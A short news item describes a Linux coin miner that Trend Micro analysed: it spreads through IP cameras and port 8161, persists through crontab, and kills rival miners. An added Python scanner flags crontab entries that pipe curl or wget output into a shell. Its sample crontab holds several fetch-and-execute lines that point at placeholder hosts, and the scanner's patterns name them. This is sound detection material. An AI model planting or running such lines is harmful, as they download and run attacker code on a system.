Coin miners have become the new norm in the malware world, and new versions are getting more complex, hiding their processes more effectively in order to avoid detection.
But security vendor Trend Micro has recently come across a new Linux coin miner whose purpose isn’t only to run without users being aware of it, but to also remove the other malware and miners that are found on a compromised system.
In an analysis of the script, the security company explains that it uses code from KORKERDS and relies on crontabs to make sure it launches after reboot.
The script that the malware uses for spreading downloads a modified version of XMR-Stak, a cryptocurrency miner that is specifically aimed at Cryptonight currencies and which can make use of CPUs, as well as NVIDIA and AMD GPUs, for its mining.
Trend Micro explains that the malware targets systems via IP cameras and web services on TCP port 8161, which the attacker uses to send a crontab file whose purpose is to download a shell script.
Once the script reaches a target device, it removes all malware, coin miners, and the services associated with them, in an attempt to use all available resources for its own mining tasks. By killing off the other miners and malware on the system, the script ensures that the computer's resources are always available for its own processes.
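Because the miner described above relies on a crontab entry that fetches and runs a shell script, a defender's first check is the cron tables themselves. The following Python is an added example, not code from the article or from Trend Micro: it flags crontab lines that combine a downloader (curl/wget) with a pipe into a shell interpreter, and the sample crontab, IP addresses and paths in it are constructed for illustration.

```python
import os
import re

# Constructed sample crontab (documentation-range IPs, not real indicators).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
@reboot wget -q -O- http://example.invalid/m.sh | bash
30 3 * * 0 /usr/local/bin/backup.sh
*/10 * * * * (curl -s http://203.0.113.7/a.sh || wget -qO- http://203.0.113.7/a.sh) | bash
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# "| sh", "| bash", "bash -c", "sh -c": a remote payload handed straight to a shell.
SHELL_SINK = re.compile(r"\|\s*(ba)?sh\b|\bbash\s+-c\b|\bsh\s+-c\b")
URL = re.compile(r"https?://[^\s'\")]+")

def suspicious_cron_entries(crontab_text):
    """Return a list of (line_number, urls) for entries that download a
    remote resource and pipe it into a shell interpreter."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank line or comment
        if DOWNLOADER.search(stripped) and SHELL_SINK.search(stripped):
            findings.append((lineno, URL.findall(stripped)))
    return findings

def scan_crontab_files(paths):
    """Scan each readable crontab file; returns {path: findings}."""
    results = {}
    for path in paths:
        if os.path.isfile(path) and os.access(path, os.R_OK):
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_cron_entries(fh.read())
            if hits:
                results[path] = hits
    return results

if __name__ == "__main__":
    # Typical system locations on Linux; per-user spools need root to read.
    locations = ["/etc/crontab"] + [
        os.path.join(d, f) for d in ("/etc/cron.d", "/var/spool/cron/crontabs")
        if os.path.isdir(d) for f in os.listdir(d)]
    for path, hits in scan_crontab_files(locations).items():
        for lineno, urls in hits:
            print(f"{path}:{lineno}: fetch-and-execute entry, urls={urls}")
```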
Submitted by: Arnfried Walbrecht